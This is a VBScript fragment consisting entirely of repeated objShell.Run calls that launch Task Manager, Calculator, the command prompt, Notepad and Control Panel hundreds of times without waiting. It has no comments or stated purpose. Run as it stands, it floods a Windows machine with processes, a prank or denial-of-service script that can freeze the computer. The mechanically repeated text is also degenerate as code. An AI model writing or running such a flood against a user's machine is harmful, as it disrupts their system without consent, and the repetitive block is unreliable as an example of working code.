objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
